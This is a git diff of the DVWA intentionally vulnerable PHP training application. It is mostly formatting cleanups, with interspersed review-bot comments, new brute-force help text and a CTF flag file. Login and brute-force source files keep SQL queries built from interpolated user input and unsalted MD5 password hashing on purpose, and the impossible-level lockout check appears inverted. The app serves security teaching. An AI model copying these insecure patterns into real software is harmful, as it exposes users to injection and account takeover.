@@ -329,10 +334,10 @@ function dvwaHtmlEcho( $pPage ) { function dvwaHelpHtmlEcho( $pPage ) { - // Send Headers - Header( 'Cache-Control: no-cache, must-revalidate'); // HTTP/1.1 - Header( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers... - Header( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past + // Send Headers + Header( 'Cache-Control: no-cache, must-revalidate'); // HTTP/1.1 + Header( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers... + Header( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past echo " @@ -345,9 +350,9 @@ function dvwaHelpHtmlEcho( $pPage ) { {$pPage[ 'title' ]} - + - + @@ -366,10 +371,10 @@ function dvwaHelpHtmlEcho( $pPage ) { function dvwaSourceHtmlEcho( $pPage ) { - // Send Headers - Header( 'Cache-Control: no-cache, must-revalidate'); // HTTP/1.1 - Header( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers... - Header( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past + // Send Headers + Header( 'Cache-Control: no-cache, must-revalidate'); // HTTP/1.1 + Header( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers... + Header( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past echo " @@ -382,9 +387,9 @@ function dvwaSourceHtmlEcho( $pPage ) { {$pPage[ 'title' ]} - + - + @@ -404,23 +409,23 @@ function dvwaSourceHtmlEcho( $pPage ) { // To be used on all external links -- function dvwaExternalLinkUrlGet( $pLink,$text=null ) { if(is_null( $text )) { - return ''.$pLink.''; + return '' . $pLink . ''; } else { - return ''.$text.''; + return '' . $text . ''; } } // -- END ( external links) function dvwaButtonHelpHtmlGet( $pId ) { $security = dvwaSecurityLevelGet(); - return ""; + return ""; } function dvwaButtonSourceHtmlGet( $pId ) { $security = dvwaSecurityLevelGet(); - return ""; + return ""; } @@ -441,9 +446,9 @@ function dvwaButtonSourceHtmlGet( $pId ) { //$DBMS_connError = ' //
-// -//
Unable to connect to the database.
'.$DBMS_errorFunc.'

-// Click here to setup the database. +// +//
Unable to connect to the database.
' . $DBMS_errorFunc . '

+// Click here to setup the database. //
'; function dvwaDatabaseConnect() { @@ -457,22 +462,22 @@ function dvwaDatabaseConnect() { || !@mysql_select_db( $_DVWA[ 'db_database' ] ) ) { //die( $DBMS_connError ); dvwaLogout(); - dvwaMessagePush( 'Unable to connect to the database.
'.$DBMS_errorFunc ); - dvwaRedirect( DVWA_WEB_PAGE_TO_ROOT.'setup.php' ); + dvwaMessagePush( 'Unable to connect to the database.
' . $DBMS_errorFunc ); + dvwaRedirect( DVWA_WEB_PAGE_TO_ROOT . 'setup.php' ); } // MySQL PDO Prepared Statements (for impossible levels) - $db = new PDO('mysql:host='.$_DVWA[ 'db_server' ].';dbname='.$_DVWA[ 'db_database' ].';charset=utf8', $_DVWA[ 'db_user' ], $_DVWA[ 'db_password' ]); + $db = new PDO('mysql:host=' . $_DVWA[ 'db_server' ].';dbname=' . $_DVWA[ 'db_database' ].';charset=utf8', $_DVWA[ 'db_user' ], $_DVWA[ 'db_password' ]); $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false); } - elseif ( $DBMS == 'PGSQL' ) { + elseif( $DBMS == 'PGSQL' ) { //$dbconn = pg_connect("host={$_DVWA[ 'db_server' ]} dbname={$_DVWA[ 'db_database' ]} user={$_DVWA[ 'db_user' ]} password={$_DVWA[ 'db_password' ])}" //or die( $DBMS_connError ); dvwaMessagePush( 'PostgreSQL is not yet fully supported.' ); dvwaPageReload(); } else { - die ( 'Unknown $DBMS selected' ); + die ( "Unknown {$DBMS} selected." ); } } 
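Review bot: The rewritten PDO DSN line still mixes the two spacing styles this commit is meant to unify: `'mysql:host=' . $_DVWA[ 'db_server' ].';dbname=' . $_DVWA[ 'db_database' ].';charset=utf8'` has ` . ` on some joins and a bare `.` on the others. While the line is being touched, `elseif( $DBMS == 'PGSQL' )` would be better as `elseif( $DBMS === 'PGSQL' )`, matching the string comparison the rest of the function relies on. dvwaDatabaseConnect() starts before this hunk.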
@@ -535,18 +540,23 @@ function tokenField() { # Return a field for the (CSRF) token // Setup Functions -- -$PHPUploadPath = realpath( getcwd() )."/hackable/uploads/"; -$PHPIDSPath = realpath( getcwd() )."/external/phpids/0.6/lib/IDS/tmp/"; -$phpSafeMode = 'PHP safe mode: ' . ( ini_get( 'safe_mode' ) ? 'Enabled' : 'Disabled' ) . ''; // DEPRECATED as of PHP 5.3.0 and REMOVED as of PHP 5.4.0 -$phpDisplayErrors = 'PHP display errors: '.( ini_get( 'display_errors' ) ? 'Enabled (Easy Mode!)' : 'Disabled' ); // Verbose error messages (e.g. full path disclosure) -$phpURLInclude = 'PHP allow URL include: '.( ini_get( 'allow_url_include' ) ? 'Enabled' : 'Disabled' ) . ''; // RFI -$phpURLFopen = 'PHP allow URL fopen: '.( ini_get( 'allow_url_fopen' ) ? 'Enabled' : 'Disabled' ) . ''; // RFI -$phpMagicQuotes = 'PHP magic quotes: ' . ( ini_get( 'magic_quotes_gpc' ) ? 'Enabled(*)' : 'Disabled' ) . ''; // DEPRECATED as of PHP 5.3.0 and REMOVED as of PHP 5.4.0 -$DVWARecaptcha = 'reCAPTCHA key: ' . ( ( isset( $_DVWA[ 'recaptcha_public_key' ] ) && $_DVWA[ 'recaptcha_public_key' ] != '' ) ? $_DVWA[ 'recaptcha_public_key' ] : 'Missing(*)' ) . ''; -$DVWAUploadsWrite = 'Writable '.$PHPUploadPath.': ' . ( is_writable( $PHPUploadPath ) ? 'Yes' : 'No(*)' ) . ''; // File Upload -$DVWAPHPWrite = 'Writable '.$PHPIDSPath.': ' . ( is_writable( $PHPIDSPath ) ? 'Yes' : 'No(*)' ) . ''; // PHPIDS +$PHPUploadPath = realpath( getcwd() ) . "/hackable/uploads/"; +$PHPIDSPath = realpath( getcwd() ) . "/external/phpids/" . dvwaPhpIdsVersionGet() . "/lib/IDS/tmp/phpids_log.txt"; + +$phpDisplayErrors = 'PHP function display_errors: ' . ( ini_get( 'display_errors' ) ? 'Enabled (Easy Mode!)' : 'Disabled' ); // Verbose error messages (e.g. full path disclosure) +$phpSafeMode = 'PHP function safe_mode: Enabled' : 'success">Disabled' ) . ''; // DEPRECATED as of PHP 5.3.0 and REMOVED as of PHP 5.4.0 +$phpMagicQuotes = 'PHP function magic_quotes_gpc: Enabled' : 'success">Disabled' ) . 
''; // DEPRECATED as of PHP 5.3.0 and REMOVED as of PHP 5.4.0 +$phpURLInclude = 'PHP function allow_url_include: Enabled' : 'failure">Disabled' ) . ''; // RFI +$phpURLFopen = 'PHP function allow_url_fopen: Enabled' : 'failure">Disabled' ) . ''; // RFI +$phpGD = 'PHP module php-gd: Installed' : 'failure">Missing' ) . ''; // File Upload + +$DVWARecaptcha = 'reCAPTCHA key: ' . $_DVWA[ 'recaptcha_public_key' ] : 'failure">Missing' ) . ''; + +$DVWAUploadsWrite = 'Writable folder ' . $PHPUploadPath . ': Yes)' : 'failure">No' ) . ''; // File Upload +$DVWAPHPWrite = 'Writable file ' . $PHPIDSPath . ': Yes' : 'failure">No' ) . ''; // PHPIDS + $DVWAOS = 'Operating system: ' . ( strtoupper(substr(PHP_OS, 0, 3)) === 'WIN' ? 'Windows' : '*nix' ) . ''; -$SERVER_NAME = 'Web Server SERVER_NAME: ' . $_SERVER[ 'SERVER_NAME' ] . ''; // CSRF +$SERVER_NAME = 'Web Server SERVER_NAME: ' . $_SERVER[ 'SERVER_NAME' ] . ''; // CSRF // -- END (Setup Functions) ?> diff --git a/dvwa/includes/dvwaPhpIds.inc.php b/dvwa/includes/dvwaPhpIds.inc.php index 09dc0f9ea..1d7880483 100644 --- a/dvwa/includes/dvwaPhpIds.inc.php +++ b/dvwa/includes/dvwaPhpIds.inc.php @@ -5,11 +5,11 @@ exit; } -define( 'DVWA_WEB_ROOT_TO_PHPIDS', 'external/phpids/'.dvwaPhpIdsVersionGet().'/' ); -define( 'DVWA_WEB_PAGE_TO_PHPIDS', DVWA_WEB_PAGE_TO_ROOT.DVWA_WEB_ROOT_TO_PHPIDS ); +define( 'DVWA_WEB_ROOT_TO_PHPIDS', 'external/phpids/' . dvwaPhpIdsVersionGet() . '/' ); +define( 'DVWA_WEB_PAGE_TO_PHPIDS', DVWA_WEB_PAGE_TO_ROOT . DVWA_WEB_ROOT_TO_PHPIDS ); // Add PHPIDS to include path -set_include_path( get_include_path().PATH_SEPARATOR.DVWA_WEB_PAGE_TO_PHPIDS.'lib/' ); +set_include_path( get_include_path() . PATH_SEPARATOR . DVWA_WEB_PAGE_TO_PHPIDS . 'lib/' ); require_once 'IDS/Init.php'; 
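Review bot: `$DVWAUploadsWrite` renders a stray parenthesis in the success case — the branch reads `'success">Yes)'` and should be `'success">Yes'`. `$PHPIDSPath` now names the log file itself (`.../lib/IDS/tmp/phpids_log.txt`) rather than its directory; if the writability test on the `$DVWAPHPWrite` line (its ternary is not fully visible here) is `is_writable( $PHPIDSPath )`, it reports "No" on a fresh install where the file has not been created yet even though the directory is writable, so consider `file_exists( $PHPIDSPath ) ? is_writable( $PHPIDSPath ) : is_writable( dirname( $PHPIDSPath ) )`. The removed `$DVWARecaptcha` line guarded the key with `isset( $_DVWA[ 'recaptcha_public_key' ] )`; the new line's condition is not visible in this view, so confirm the guard survived or an older config file without that key will raise a notice on the setup page.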
@@ -19,20 +19,19 @@ function dvwaPhpIdsVersionGet() { // PHPIDS Log parsing function function dvwaReadIdsLog() { - $file_array = file(DVWA_WEB_PAGE_TO_PHPIDS_LOG); + $file_array = file( DVWA_WEB_PAGE_TO_PHPIDS_LOG ); $data = ''; - foreach ($file_array as $line_number => $line) { - $line = explode(",", $line); - $line = str_replace("\""," ",$line); + foreach( $file_array as $line_number => $line ) { + $line = explode( ",", $line ); + $line = str_replace( "\"", " ", $line ); - $datetime = $line[1]; + $datetime = $line[1]; $vulnerability = $line[3]; - $variable = urldecode($line[4]); - $request = urldecode($line[5]); - $ip = $line[6]; - + $variable = urldecode($line[4]); + $request = urldecode($line[5]); + $ip = $line[6]; $data .= "
\nDate/Time: {$datetime}
\nVulnerability: {$vulnerability}
\nRequest: " . htmlspecialchars($request) . "
\nVariable: " . htmlspecialchars($variable) . "
\nIP: {$ip}
"; } @@ -41,9 +40,9 @@ function dvwaReadIdsLog() { // Clear PHPIDS log function dvwaClearIdsLog() { - if(isset($_GET['clear_log'])) { - $fp = fopen(DVWA_WEB_PAGE_TO_PHPIDS_LOG, w); - fclose($fp); + if( isset( $_GET[ 'clear_log' ] ) ) { + $fp = fopen( DVWA_WEB_PAGE_TO_PHPIDS_LOG, w ); + fclose( $fp ); dvwaMessagePush( "PHPIDS log cleared" ); dvwaPageReload(); } @@ -51,25 +50,32 @@ function dvwaClearIdsLog() { // Main PHPIDS function function dvwaPhpIdsTrap() { + global $_DVWA; try { + + /* + * 1. Define what to scan + * Please keep in mind what array_merge does and how this might interfer + * with your variables_order settings + */ $request = array( 'REQUEST' => $_REQUEST, - 'GET' => $_GET, - 'POST' => $_POST, - 'COOKIE' => $_COOKIE + 'GET' => $_GET, + 'POST' => $_POST, + 'COOKIE' => $_COOKIE ); - $init = IDS_Init::init( DVWA_WEB_PAGE_TO_PHPIDS.'lib/IDS/Config/Config.ini' ); + $init = IDS_Init::init( DVWA_WEB_PAGE_TO_PHPIDS . 'lib/IDS/Config/Config.ini' ); - $init->config['General']['base_path'] = DVWA_WEB_PAGE_TO_PHPIDS.'lib/IDS/'; - $init->config['General']['use_base_path'] = true; - $init->config['Caching']['caching'] = 'none'; + $init->config[ 'General' ][ 'base_path' ] = DVWA_WEB_PAGE_TO_PHPIDS . 'lib/IDS/'; + $init->config[ 'General' ][ 'use_base_path' ] = true; + $init->config[ 'Caching' ][ 'caching' ] = 'none'; // 2. Initiate the PHPIDS and fetch the results $ids = new IDS_Monitor( $request, $init ); $result = $ids->run(); - if(!$result->isEmpty()) { + if( !$result->isEmpty() ) { require_once 'IDS/Log/File.php'; require_once 'IDS/Log/Composite.php'; @@ -78,20 +84,17 @@ function dvwaPhpIdsTrap() { $compositeLog->execute($result); - echo 'Hacking attempt detected and logged.'; + echo 'Hacking attempt detected and logged.
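Review bot: `fopen( DVWA_WEB_PAGE_TO_PHPIDS_LOG, w )` in `dvwaClearIdsLog()` passes the mode as the bare constant `w`, which PHP only tolerates by falling back to the string `'w'` with a warning and which is a fatal `Error` on PHP 8; it should be the string literal, `$fp = fopen( DVWA_WEB_PAGE_TO_PHPIDS_LOG, 'w' );`. The return value is never checked either, so when the log is not writable `fclose( $fp )` runs on `false` and the "PHPIDS log cleared" message is still pushed; guard it with `if( $fp !== false )` before the `fclose` and the message, and push a failure message otherwise.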
Have a nice day.'; + + if( $_DVWA[ 'default_phpids_verbose' ] == 'true' ) + echo $result; - // echo $result; exit; } - } catch (Exception $e) { - /* - * something went terribly wrong - maybe the - * filter rules weren't found? - */ - printf( - 'An error occured: %s', - $e->getMessage() - ); + } + catch (Exception $e) { + // Something went terribly wrong - maybe the filter rules weren't found? + printf( 'An error occured: %s', $e->getMessage() ); } } diff --git a/hackable/flags/fi.php b/hackable/flags/fi.php new file mode 100644 index 000000000..a9a29c42a --- /dev/null +++ b/hackable/flags/fi.php @@ -0,0 +1,24 @@ + + +1.) Bond. James Bond + +
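Review bot: `$_DVWA[ 'default_phpids_verbose' ] == 'true'` reads a config key without checking it exists, so a `config.inc.php` written before this option was added raises an undefined-index notice on every detected request; use `isset( $_DVWA[ 'default_phpids_verbose' ] ) && $_DVWA[ 'default_phpids_verbose' ] === 'true'`. The `echo $result` that follows writes the IDS report, which carries the offending request values, straight into the response; that is only safe if `IDS_Report::__toString()` HTML-escapes those values in the bundled PHPIDS version, which should be confirmed before shipping this switch. The catch block's `printf( 'An error occured: %s', $e->getMessage() )` echoes raw exception text to the client and misspells "occurred"; logging the message and showing a generic string would be the safer shape. `global $_DVWA` is declared in the previous hunk of this function for use here.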
\n"; + +$line3 = "3.) Romeo, Romeo! wherefore art thou Romeo?"; +$line3 = "--LINE MISSING--"; +echo $line3 . "\n\n

\n"; + +$line4 = "NC4pI" . "FRoZSBwb29s" . "IG9uIH" . "RoZSByb29mIG1" . "1c3QgaGF" . "2ZSBh" . "IGxlY" . "Wsu"; +echo base64_decode( $line4 ); + +?> + + diff --git a/ids_log.php b/ids_log.php index bde7bbb43..d01e081fc 100644 --- a/ids_log.php +++ b/ids_log.php @@ -1,15 +1,15 @@

PHPIDS Log

-

". dvwaReadIdsLog() ."

+

" . dvwaReadIdsLog() . "



-
+ - ".dvwaClearIdsLog()." - -"; + " . dvwaClearIdsLog() . " +"; dvwaHtmlEcho( $page ); diff --git a/index.php b/index.php index c7c45915b..f672abeb9 100644 --- a/index.php +++ b/index.php @@ -1,12 +1,12 @@

WARNING!

-

Damn Vulnerable Web Application is damn vulnerable! Do not upload it to your hosting provider's public html folder or any Internet facing servers, as they will be compromised. It is recommend using a virtual machine (such as ".dvwaExternalLinkUrlGet( 'https://www.virtualbox.org/','VirtualBox' )." or ".dvwaExternalLinkUrlGet( 'https://www.vmware.com/','VMware' )."), which is set to NAT networking mode. Inside a guest machine, you can downloading and install ".dvwaExternalLinkUrlGet( 'https://www.apachefriends.org/en/xampp.html','XAMPP' )." for the web server and database.

+

Damn Vulnerable Web Application is damn vulnerable! Do not upload it to your hosting provider's public html folder or any Internet facing servers, as they will be compromised. It is recommend using a virtual machine (such as " . dvwaExternalLinkUrlGet( 'https://www.virtualbox.org/','VirtualBox' ) . " or " . dvwaExternalLinkUrlGet( 'https://www.vmware.com/','VMware' ) . "), which is set to NAT networking mode. Inside a guest machine, you can downloading and install " . dvwaExternalLinkUrlGet( 'https://www.apachefriends.org/en/xampp.html','XAMPP' ) . " for the web server and database.


Disclaimer

We do not take responsibility for the way in which any one uses this application (DVWA). We have made the purposes of the application clear and it should not be used maliciously. We have given warnings and taken measures to prevent users from installing DVWA on to live web servers. If your web server is compromised via an installation of DVWA it is not our responsibility it is the responsibility of the person/s who uploaded and installed it.

@@ -37,7 +37,7 @@

DVWA aims to cover the most commonly seen vulnerabilities found in today's web applications. However there are plenty of other issues with web applications. Should you wish to explore any additional attack vectors, or want more difficult challenges, you may wish to look into the following other projects:

diff --git a/instructions.php b/instructions.php index b89b071c6..8d17c3770 100644 --- a/instructions.php +++ b/instructions.php @@ -1,12 +1,12 @@ array( 'legend' => 'PDF Guide', 'file' => 'docs/pdf.html' ), 'changelog' => array( 'legend' => 'Change Log', 'file' => 'CHANGELOG.md' ), 'copying' => array( 'legend' => 'Copying', 'file' => 'COPYING.txt' ), - 'PHPIDS-license' => array( 'legend' => 'PHPIDS License', 'file' => DVWA_WEB_PAGE_TO_PHPIDS.'LICENSE' ), + 'PHPIDS-license' => array( 'legend' => 'PHPIDS License', 'file' => DVWA_WEB_PAGE_TO_PHPIDS . 'LICENSE' ), ); $selectedDocId = isset( $_GET[ 'doc' ] ) ? $_GET[ 'doc' ] : ''; @@ -52,10 +52,9 @@ function urlReplace( $matches ) { {$docMenuHtml} - {$instructions} + {$instructions} - -"; +"; dvwaHtmlEcho( $page ); diff --git a/login.php b/login.php index dcd69ca09..d0ca8bc22 100644 --- a/login.php +++ b/login.php @@ -1,7 +1,7 @@ Need to run 'setup.php'." ); - dvwaRedirect( DVWA_WEB_PAGE_TO_ROOT.'setup.php' ); + dvwaRedirect( DVWA_WEB_PAGE_TO_ROOT . 'setup.php' ); } $query = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';"; @@ -35,10 +35,10 @@ if( $result && mysql_num_rows( $result ) == 1 ) { // Login Successful... dvwaMessagePush( "You have logged in as '{$user}'" ); dvwaLogin( $user ); - dvwaRedirect( DVWA_WEB_PAGE_TO_ROOT.'index.php' ); + dvwaRedirect( DVWA_WEB_PAGE_TO_ROOT . 'index.php' ); } - // Login failed + // Login failed dvwaMessagePush( 'Login failed' ); dvwaRedirect( 'login.php' ); } @@ -46,14 +46,13 @@ $messagesHtml = messagesPopAllToHtml(); Header( 'Cache-Control: no-cache, must-revalidate'); // HTTP/1.1 -Header( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers... -Header( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past +Header( 'Content-Type: text/html;charset=utf-8' ); // TODO- proper XHTML headers... +Header( 'Expires: Tue, 23 Jun 2009 12:00:00 GMT' ); // Date in the past // Anti-CSRF generateSessionToken(); echo " - 
@@ -64,20 +63,26 @@ Login :: Damn Vulnerable Web Application (DVWA) v" . dvwaVersionGet() . " - + -
+
+ +

-

+


+
+ +
+
@@ -87,16 +92,16 @@
+

- ".tokenField()." + " . tokenField() . "
-
{$messagesHtml} @@ -110,15 +115,19 @@

- + +
+ +
+ +

" . dvwaExternalLinkUrlGet( 'http://www.dvwa.co.uk/', 'Damn Vulnerable Web Application (DVWA)' ) . " is a RandomStorm OpenSource project.

-

Damn Vulnerable Web Application (DVWA) is a RandomStorm OpenSource project

+
-
+
- -"; +"; ?> diff --git a/logout.php b/logout.php index 145982db6..e02be1438 100644 --- a/logout.php +++ b/logout.php @@ -1,7 +1,7 @@ Security level is currently: $securityLevel.

"; } - $securityOptionsHtml .= ""; + $securityOptionsHtml .= ""; } $phpIdsHtml = 'PHPIDS is currently: '; @@ -72,9 +72,16 @@ // Anti-CSRF generateSessionToken(); +// Able to write to the PHPIDS log file? +$WarningHtml = ''; +if( !is_writable( $PHPIDSPath ) ) { + $WarningHtml .= "

Cannot write to the PHPIDS log file: ${PHPIDSPath}
"; +} + + $page[ 'body' ] .= "
-

DVWA Security

+

DVWA Security


Security Level

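Review bot: The new warning block interpolates `${PHPIDSPath}` inside the double-quoted string; that `${var}` form is deprecated as of PHP 8.2 and the rest of this page uses `{$var}`, so write `{$PHPIDSPath}`. `!is_writable( $PHPIDSPath )` is also true for a log file that simply has not been created yet, so on a fresh install the "Cannot write to the PHPIDS log file" warning appears even when the `tmp/` directory is writable; test the directory when the file is absent, e.g. `if( !( file_exists( $PHPIDSPath ) ? is_writable( $PHPIDSPath ) : is_writable( dirname( $PHPIDSPath ) ) ) )`. `$PHPIDSPath` itself is defined in `dvwaPage.inc.php`, which this commit changes to a file path.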
@@ -89,13 +96,13 @@
  • Medium - This setting is mainly to give an example to the user of bad security practices, where the developer has tried but failed to secure an application. It also acts as a challenge to users to refine their exploitation techniques.
  • High - This option is an extension to the medium difficulty, with a mixture of harder or alternative bad practices to attempt to secure the code. The vulnerability may not allow the same extent of the exploitation, similar in various Capture The Flags (CTFs) competitions.
  • Impossible - This level should be secure against all vulnerabilities. It is used to compare the vulnerable source code to the secure source code.
    - Priority to DVWA v1.9, this level was known as 'high'.
  • + Priority to DVWA v1.9, this level was known as 'high'. - ".tokenField()." + " . tokenField() . "
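Review bot: The impossible-level description on the new line reads `Priority to DVWA v1.9, this level was known as 'high'.`; the intended word is "Prior", so the text should be `Prior to DVWA v1.9, this level was known as 'high'.`. This is user-visible text on the security page and the line is already rewritten by this commit.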
    @@ -103,15 +110,15 @@

    PHPIDS

    -

    ".dvwaExternalLinkUrlGet( 'https://github.com/PHPIDS/PHPIDS', 'PHPIDS' )." v".dvwaPhpIdsVersionGet()." (PHP-Intrusion Detection System) is a security layer for PHP based web applications.

    + {$WarningHtml} +

    " . dvwaExternalLinkUrlGet( 'https://github.com/PHPIDS/PHPIDS', 'PHPIDS' ) . " v" . dvwaPhpIdsVersionGet() . " (PHP-Intrusion Detection System) is a security layer for PHP based web applications.

    PHPIDS works by filtering any user supplied input against a blacklist of potentially malicious code. It is used in DVWA to serve as a live example of how Web Application Firewalls (WAFs) can help improve security and in some cases how WAFs can be circumvented.

    You can enable PHPIDS across this site for the duration of your session.

    {$phpIdsHtml}

    [\">Simulate attack] - [View IDS log] -
    -"; +"; dvwaHtmlEcho( $page ); diff --git a/setup.php b/setup.php index aa72fcb54..9faffc6fd 100644 --- a/setup.php +++ b/setup.php @@ -1,12 +1,12 @@ -

    Database Setup

    +

    Database Setup

    Click on the 'Create / Reset Database' button below to create or reset your database.
    If you get an error make sure you have the correct user credentials in: " . realpath( getcwd() ) . "/config/config.inc.php

    @@ -45,34 +45,34 @@

    Setup Check

    {$DVWAOS}
    - Backend database: ".$DBMS."
    - PHP version: v".phpversion()."
    + Backend database: {$DBMS}
    + PHP version: " . phpversion() . "

    {$SERVER_NAME}

    - {$phpSafeMode}
    {$phpDisplayErrors}
    + {$phpSafeMode}
    {$phpURLInclude}
    {$phpURLFopen}
    {$phpMagicQuotes}
    + {$phpGD}

    {$DVWARecaptcha}

    {$DVWAUploadsWrite}
    {$DVWAPHPWrite}

    - Status with \"(*)\" indicate there could be possible issue(s) with a certain modules.
    + Status in red, indicate there will be an issue when trying to complete some modules.



    - ".tokenField()." + " . tokenField() . "


    - -"; +"; dvwaHtmlEcho( $page ); diff --git a/vulnerabilities/brute/help/help.php b/vulnerabilities/brute/help/help.php index 5d2f3cd86..ebe4c6821 100644 --- a/vulnerabilities/brute/help/help.php +++ b/vulnerabilities/brute/help/help.php @@ -5,13 +5,58 @@
    -

    Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.

    +

    About

    +

    Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. + A common approach is to repeatedly try guesses for the password.

    -

    Users often choose weak passwords. Examples of insecure choices include single words found in dictionaries, given and family names, any too short password - (usually thought to be 6 or 7 characters or less), or any password meeting a too restrictive and so predictable, pattern (eg, alternating vowels and consonants).

    +

    Users often choose weak passwords. Examples of insecure choices include single words found in dictionaries, family names, any too short password + (usually thought to be less than 6 or 7 characters), or predictable patterns + (e.g. alternating vowels and consonants, which is known as leetspeak, so "password" becomes "p@55w0rd").

    + +

    Creating a targeted wordlists, which is generated towards the target, often gives the highest success rate. There are public tools out there that will create a dictionary + based on a combination of company websites, personal social networks and other common information (such as birthdays or year of graduation).

    A last resort is to try every possible password, known as a brute force attack. In theory, if there is no limit to the number of attempts, a brute force attack will always - be successful since the rules for acceptable passwords must be publicly known; but as the length of the password increases, so does the number of possible passwords.

    + be successful since the rules for acceptable passwords must be publicly known; but as the length of the password increases, so does the number of possible passwords + making the attack time longer.

    + +


    + +

    Objective

    +

    Your goal is to get the administrator’s password by brute forcing. Bonus points for getting the other four user passwords!

    + +


    + +

    Low Level

    +

    The developer has completely missed out any protections methods, allowing for anyone to try as many times as they wish, to login to any user without any repercussions.

    + +
    + +

    Medium Level

    +

    This stage adds a sleep on the failed login screen. This mean when you login incorrectly, there will be an extra two second wait before the page is visible.

    + +

    This will only slow down the amount of requests which can be processed a minute, making it longer to brute force.

    + +
    + +

    High Level

    +

    There has been an "anti Cross-Site Request Forgery (CSRF) token" used. There is a old myth that this protection will stop brute force attacks. This is not the case. + This level also extends on the medium level, by waiting when there is a failed login but this time it is a random amount of time between two and four seconds. + The idea of this is to try and confuse any timing predictions.

    + +

    Using a form could have a similar effect as a CSRF token.

    + +
    + +

    Impossible Level

    +

    Brute force (and user enumeration) should not be possible in the impossible level. The developer has added a "lock out" feature, where if there are five bad logins within + the last 15 minutes, the locked out user cannot log in.

    + +

    If the locked out user tries to login, even with a valid password, it will say their username or password is incorrect. This will make it impossible to know + if there is a valid account on the system, with that password, and if the account is locked.

    + +

    This can cause a "Denial of Service" (DoS), by having someone continually trying to login to someone's account. + This level would need to be extended by blacklisting the attacker (e.g. IP address, country, user-agent).

    @@ -20,5 +65,5 @@
    -

    Reference: https://en.wikipedia.org/wiki/Password_cracking

    +

    Reference:

    diff --git a/vulnerabilities/brute/index.php b/vulnerabilities/brute/index.php index 9bceadf38..76a950860 100644 --- a/vulnerabilities/brute/index.php +++ b/vulnerabilities/brute/index.php @@ -1,17 +1,18 @@ @@ -37,14 +39,13 @@

    Login

    -
    + Username:

    Password:


    - -"; + \n"; if( $vulnerabilityFile == 'high.php' || $vulnerabilityFile == 'impossible.php' ) $page[ 'body' ] .= " " . tokenField(); @@ -56,12 +57,11 @@

    More Information

    -
    -"; +\n"; dvwaHtmlEcho( $page ); diff --git a/vulnerabilities/brute/source/high.php b/vulnerabilities/brute/source/high.php index ff69d2528..1d6c70628 100644 --- a/vulnerabilities/brute/source/high.php +++ b/vulnerabilities/brute/source/high.php @@ -15,14 +15,15 @@ $pass = mysql_real_escape_string( $pass ); $pass = md5( $pass ); - $query = "SELECT * FROM `users` WHERE user='$user' AND password='$pass';"; + // Check database + $query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';"; $result = mysql_query( $query ) or die( '
    ' . mysql_error() . '
    ' ); if( $result && mysql_num_rows( $result ) == 1 ) { // Get users details $avatar = mysql_result( $result, 0, "avatar" ); - // Login Successful + // Login successful $html .= "

    Welcome to the password protected area {$user}

    "; $html .= ""; } @@ -31,6 +32,8 @@ sleep( rand( 0, 3 ) ); $html .= "

    Username and/or password incorrect.
    "; } + + mysql_close(); } // Generate Anti-CSRF token diff --git a/vulnerabilities/brute/source/impossible.php b/vulnerabilities/brute/source/impossible.php index 30350e5f0..6e46238c7 100644 --- a/vulnerabilities/brute/source/impossible.php +++ b/vulnerabilities/brute/source/impossible.php @@ -1,75 +1,93 @@ ' . mysql_error() . '' ); + // Check the database (Check user information) + $data = $db->prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' ); + $data->bindParam( ':user', $user, PDO::PARAM_STR ); + $data->execute(); + $row = $data->fetch(); - if( $result && mysql_num_rows( $result ) == 1 && mysql_result( $result, 0, "failed_login" ) >= $total_failed_login ) { - // User locked out. Note, this method will allow for user enumeration! - // $html .= "

    This account has been locked due to too many incorrect logins.
    "; + // Check to see if the user has been locked out. + if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) ) { + // User locked out. Note, using this method would allow for user enumeration! + //$html .= "

    This account has been locked due to too many incorrect logins.
    "; - $last_login = mysql_result( $result, 0, "last_login" ); + // Calculate when the user would be allowed to login again + $last_login = $row[ 'last_login' ]; $last_login = strtotime( $last_login ); - $timeout = strtotime( "${$last_login} +{$lockout_time} minutes" ); + $timeout = strtotime( "{$last_login} +{$lockout_time} minutes" ); $timenow = strtotime( "now" ); - $account_locked = false; - if( $timeout < $timenow ) + // Check to see if enough time has passed, if it hasn't locked the account + if( $timenow > $timeout ) $account_locked = true; } - $query = "SELECT * FROM `users` WHERE user='$user' AND password='$pass' AND failed_login < {$total_failed_login} LIMIT 1;"; - $result = mysql_query( $query ) or die( '
    ' . mysql_error() . '
    ' ); + // Check the database (if username matches the password) + $data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' ); + $data->bindParam( ':user', $user, PDO::PARAM_STR); + $data->bindParam( ':password', $pass, PDO::PARAM_STR ); + $data->execute(); + $row = $data->fetch(); - if( $result && mysql_num_rows( $result ) == 1 && $account_locked == false) { + // If its a valid login... + if( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) { // Get users details - $avatar = mysql_result( $result, 0, "avatar" ); - $failed_login = mysql_result( $result, 0, "failed_login" ); - $last_login = mysql_result( $result, 0, "last_login" ); + $avatar = $row[ 'avatar' ]; + $failed_login = $row[ 'failed_login' ]; + $last_login = $row[ 'last_login' ]; - // Login Successful + // Login successful $html .= "

    Welcome to the password protected area {$user}

    "; $html .= ""; + // Had the account been locked out since last login? if( $failed_login >= $total_failed_login ) { $html .= "

    Warning: Someone might of been brute forcing your account.

    "; $html .= "

    Number of login attempts: {$failed_login}.
    Last login attempt was at: ${last_login}.

